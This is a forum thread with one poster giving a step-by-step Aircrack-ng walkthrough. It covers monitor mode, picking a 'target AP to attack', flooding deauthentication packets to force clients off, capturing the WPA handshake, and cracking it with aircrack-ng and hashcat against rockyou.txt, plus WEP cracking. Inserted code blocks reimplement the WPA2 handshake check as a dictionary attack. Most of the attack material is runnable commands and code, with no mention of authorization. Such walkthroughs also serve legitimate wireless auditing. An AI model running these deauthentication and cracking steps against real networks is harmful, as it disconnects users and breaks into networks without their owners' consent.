
Aircrack-ng

Posted: Mon 31 Oct 2016 8:24 pm
by Daniel Wee
1. Ensure the correct chipset is being used - best bet in SG - TP-LINK TL-WN722N

2. Install Aircrack-ng

3. Insert "blacklist wmi" into /etc/modprobe.d/blacklist.conf
- uncertain if this helps anything

4. run "ifconfig -a"
- ascertain interface name
- in my case it wasn't "wlan0" as the documents suggest
- it was "wlx18a670d5c25"

5. After starting "sudo airmon-ng start wlx18a670d5c25"
- you might get a message or two asking you to:-
a) sudo airmon-ng check kill
- do this to kill interfering processes
- it is uncertain if this will have any side effect on wpa supplicant functions
b) sudo rfkill unblock the interface name
- however, this is an incorrect instruction
- the correct way is to run "sudo rfkill list" and see which interface is blocked
- then using the NUMBER of the interface, run "sudo rfkill unblock 4" for example
- do this for all blocked interfaces, just to be safe

6. After the last step, the interface "wlx18a670d5c25" will have disappeared from the "ifconfig -a" list
- it is replaced by "wlan0mon" rather than the "mon0" as suggested by documentation

7. run "sudo airmon-ng start wlan0mon"
- this brings up a real-time updated list of beacons received
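An added example for the rfkill step above (my code, not from the post or the Aircrack-ng project): it parses the text that `rfkill list` prints, works out which index numbers to hand to `rfkill unblock`, and separates soft blocks (which `rfkill unblock` clears) from hard blocks (a physical switch or firmware setting, which it cannot). The `rfkill list` output embedded below is constructed, not taken from a real machine, and the function names are my own.

```python
"""Pick rfkill devices to unblock by index, as the post describes.

Added example, not from the original post. The SAMPLE_RFKILL_LIST text is
constructed to look like `rfkill list` output; the function names are assumptions.
"""
import re
import subprocess

# Constructed sample: one WLAN open, Bluetooth soft-blocked, a second WLAN
# soft-blocked, and a third WLAN hard-blocked by a physical switch.
SAMPLE_RFKILL_LIST = (
    "0: phy0: Wireless LAN\n"
    "\tSoft blocked: no\n"
    "\tHard blocked: no\n"
    "1: hci0: Bluetooth\n"
    "\tSoft blocked: yes\n"
    "\tHard blocked: no\n"
    "4: phy1: Wireless LAN\n"
    "\tSoft blocked: yes\n"
    "\tHard blocked: no\n"
    "5: phy2: Wireless LAN\n"
    "\tSoft blocked: no\n"
    "\tHard blocked: yes\n"
)

_DEVICE_RE = re.compile(r"^(\d+): (\S+): (.+)$")
_STATE_RE = re.compile(r"^\s+(Soft|Hard) blocked: (yes|no)\s*$")


def parse_rfkill_list(text):
    """Turn `rfkill list` output into a list of dicts: idx, name, type, soft, hard."""
    devices = []
    for line in text.splitlines():
        m = _DEVICE_RE.match(line)
        if m:
            devices.append({"idx": int(m.group(1)), "name": m.group(2),
                            "type": m.group(3).strip(), "soft": False, "hard": False})
            continue
        m = _STATE_RE.match(line)
        if m and devices:  # state lines belong to the most recent device header
            devices[-1][m.group(1).lower()] = (m.group(2) == "yes")
    return devices


def plan_unblock(devices, dev_type="Wireless LAN"):
    """Split blocked devices of one type into those a soft unblock fixes and those it cannot.

    Returns (soft_blocked_indices, hard_blocked_indices). A hard block is a physical
    switch or BIOS setting; `rfkill unblock` will not clear it.
    """
    soft = [d["idx"] for d in devices if d["type"] == dev_type and d["soft"]]
    hard = [d["idx"] for d in devices if d["type"] == dev_type and d["hard"]]
    return soft, hard


def unblock_commands(indices):
    """argv lists for `rfkill unblock <N>`, one per index (the post's "use the NUMBER" point)."""
    return [["rfkill", "unblock", str(i)] for i in indices]


def unblock_live(dev_type="Wireless LAN", execute=False):
    """Run against the real `rfkill list` (root needed to actually unblock). Dry run by default."""
    text = subprocess.run(["rfkill", "list"], capture_output=True, text=True, check=True).stdout
    soft, hard = plan_unblock(parse_rfkill_list(text), dev_type)
    for argv in unblock_commands(soft):
        print("running:" if execute else "would run:", " ".join(argv))
        if execute:
            subprocess.run(argv, check=True)
    for idx in hard:
        print(f"device {idx} is hard blocked; rfkill cannot unblock it, use the physical switch")
    return soft, hard


if __name__ == "__main__":
    devs = parse_rfkill_list(SAMPLE_RFKILL_LIST)
    soft, hard = plan_unblock(devs)
    for argv in unblock_commands(soft):
        print("sudo", " ".join(argv))
    print("hard blocked (needs physical switch):", hard)
```

Running the sample prints `sudo rfkill unblock 4` and reports index 5 as hard blocked; `unblock_live(execute=True)` does the same against the live system. Blocking Bluetooth (index 1) is left alone unless you ask for that type explicitly.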

Re: Aircrack-ng

Posted: Mon 31 Oct 2016 10:12 pm
by Daniel Wee
Select from the list the target AP to attack

1. Pick the BSSID MAC address

2. Note the channel that it is listening on

3. run "sudo airodump-ng --bssid XX:XX:XX:XX:XX:XX -c CH --write WPAcrack wlan0mon"
- where XX:XX:XX:XX:XX:XX is the MAC address of the target BSSID
- and CH is the channel number
- this will write to file WPAcrack01.cap if that doesn't exist, or will sequentially increase the number if it does

4. You need to force the user to reconnect to capture the handshake by running "sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX wlan0mon"
- this will force everyone on the AP off
- or you can be more targeted by noting which MAC shows up as connected in airodump-ng
- note the MAC number and run "sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX wlan0mon -c YY:YY:YY:YY:YY:YY"
- where YY:YY:YY:YY:YY:YY is the MAC address of the target client listed on airodump-ng
- in this example 100 is the number of de-authorization packets to send
- you can stop it once the client has been disconnected

5. Wait until airodump-ng shows (at the top line on the right end after the date) "WPA handshake"
- or WEP handshake
- that shows that you've captured a 4-way handshake
- you can stop airodump-ng with a ctrl-C

6. The capture is now in WPAcrack01.cap (or whichever is the last number)
- make sure you have the password list (usually darkc0de.lst or rockyou.txt in your current directory)
- you can crack this with aircrack-ng using "sudo aircrack-ng WPAcrack01.cap -w rockyou.txt"

7. Alternatively, you can use hashcat for GPU powered cracking
- first you will have to clean up the cap file using "sudo wpaclean clean1.cap WPAcrack01.cap"
- this will put the output in clean1.cap
- then you need to convert the format of this file into the hccap format using "sudo aircrack-ng clean1.cap -J finaloutput"
- this creates "finaloutput.hccap" in your current directory

8. Then you can invoke hashcat as follows:
- "../hashcat3.10/hashcat64.bin -m 2500 -a 0 finaloutput.hccap rockyou.txt"
- the first part is really the full path to hashcat64.bin (which also contains hashcat.exe and hashcat32.bin)
- the -m determines what kind of code you're cracking. 2500 is WPA/WPA2. Use "hashcat64.bin --help" to show available types
- -a 0 is a straight dictionary attack. -a 3 is the brute-force attack.
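An added example for steps 5 to 8 above (my code, not from the post, Aircrack-ng or hashcat): it performs the computation that aircrack-ng and hashcat -m 2500 run on a captured 4-way handshake, namely PBKDF2 of each candidate passphrase with the SSID, the PRF-512 key expansion to get the KCK, and the HMAC-SHA1 MIC check against EAPOL message 2. There is no capture file here; the SSID, MAC addresses, nonces and EAPOL frame are constructed, and the "captured" MIC is produced from a known passphrase so the dictionary attack can be run offline.

```python
"""What aircrack-ng and hashcat -m 2500 compute from a captured WPA2 handshake.

Added example, not code from the post or from the Aircrack-ng/hashcat projects.
Everything here is constructed in-code: the SSID, MACs, nonces and EAPOL frame are
made up, and the "captured" MIC is produced from a known passphrase so the attack
can be run offline with no wireless card.
"""
import hashlib
import hmac
import struct

PRF_LABEL = b"Pairwise key expansion"
MIC_OFFSET = 81  # EAPOL header (4) + descriptor type, key info, key len, replay ctr, nonce, IV, RSC, ID (77)

# Constructed RSN IE announcing CCMP pairwise/group and PSK AKM (what message 2 carries).
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")

# Constructed network: everything below is made up for the example.
SSID = "LabNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "letmein1", "correct horse", "admin123"]


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the slow step of the attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512: HMAC-SHA1 in counter mode over min/max of the MACs and nonces; 64-byte PTK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 * 20 bytes >= 64
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_eapol_msg2(snonce, mic=bytes(16)):
    """Minimal EAPOL-Key message 2 (client -> AP) carrying the given MIC field."""
    body = (
        b"\x02"                       # key descriptor type: RSN
        + struct.pack(">H", 0x010A)   # key info: pairwise, MIC present, descriptor version 2
        + struct.pack(">H", 0)        # key length (0 in message 2)
        + struct.pack(">Q", 1)        # replay counter
        + snonce                      # SNonce (32)
        + bytes(16)                   # key IV
        + bytes(8)                    # key RSC
        + bytes(8)                    # key ID
        + mic                         # key MIC (16) at MIC_OFFSET
        + struct.pack(">H", len(RSN_IE)) + RSN_IE
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type EAPOL-Key


def eapol_mic(kck, frame):
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes.
    (WPA/TKIP, descriptor version 1, uses HMAC-MD5 instead.)"""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """True if the candidate passphrase reproduces the MIC in the captured message 2."""
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return eapol_mic(kck, eapol) == eapol[MIC_OFFSET:MIC_OFFSET + 16]


def dictionary_attack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """The -a 0 loop: one PBKDF2 + PRF + HMAC per candidate; returns the match or None."""
    for word in wordlist:
        if check_passphrase(word, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
            return word
    return None


def make_constructed_capture(passphrase):
    """Stand-in for airodump-ng's .cap: message 2 with a MIC computed from a known passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))


if __name__ == "__main__":
    capture = make_constructed_capture("correct horse")
    print("recovered:", dictionary_attack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture))
```

This is why the "WPA handshake" indicator in airodump-ng matters: the attack needs the ANonce (from message 1 or 3), the SNonce and MIC (from message 2), both MAC addresses and the SSID, so a capture that only has beacons gives nothing to check candidates against. The 4096-round PBKDF2 is also why the GPU path in step 8 is so much faster than aircrack-ng on a CPU: everything after the PMK is a handful of cheap HMACs.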

for WEP

Posted: Tue 01 Nov 2016 9:13 am
by Daniel Wee
For WEP attacks, the strategy is different.

1. Capture as many packets as possible using "sudo airodump-ng -c CH --bssid XX:XX:XX:XX:XX:XX -w datafilename wlan0mon"
- this will dump captures into datafilename-01.cap

2. When you have sufficient data, process it using "sudo aircrack-ng -z datafilename-01.cap"
- you don't have to stop capturing while doing this
- process it on the fly, but doing so means aircrack-ng will go into waiting mode rather than exiting

rfkill unblock

Posted: Tue 01 Nov 2016 9:13 pm
by Daniel Wee
To make life easier, rather than always having to unblock WiFi devices by hand, create:-

/etc/systemd/system/rfkill-unblock-wifi.service

Inside it, put the following:-


[Unit]
Description=RFKill-Unblock WiFi Devices

[Service]
Type=oneshot
ExecStart=/usr/sbin/rfkill unblock wifi
ExecStop=
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
Then execute the following:-

sudo systemctl enable rfkill-unblock-wifi.service
sudo systemctl start rfkill-unblock-wifi.service